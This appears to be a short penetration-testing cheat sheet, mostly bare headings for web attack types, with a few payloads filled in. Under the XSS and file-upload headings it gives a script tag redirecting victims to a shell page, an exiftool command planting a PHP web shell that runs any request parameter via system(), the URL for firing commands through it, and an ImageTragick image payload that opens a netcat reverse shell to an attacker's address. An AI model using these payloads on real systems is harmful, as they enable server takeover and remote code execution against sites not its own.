Shell
CLI
RFI
LFI
SQL
XSS:
Comment:
<script>window.location=’http://10.10.10.10/shell.php'</script>
FTP
File Upload:
.gif .jpx
exiftool -DocumentName=”<h1>F1uffy<br><?php if (isset(\$ REQUEST[‘cmd’])){echo ‘<pre>’;\$cmd =(\$_REQUEST[‘cmd’]);system(\$cmd);echo ‘</pre>’;} __halt_compiler();?></h1>” image.php.jpg
fire commands via url www.site.com/path-to-image.php.jpg?cmd=ls
ImageTragick: nano reverse.png
push graphic-context viewbox 0 0 640 480 fill 'url(https://127.0.0.1/someimage.jpg"|nc -e /bin/sh IP_ADDRESS_HERE "PORT_HERE)' pop graphic-context
App Vulnerabilities
Admin Panel
Curl parameter injection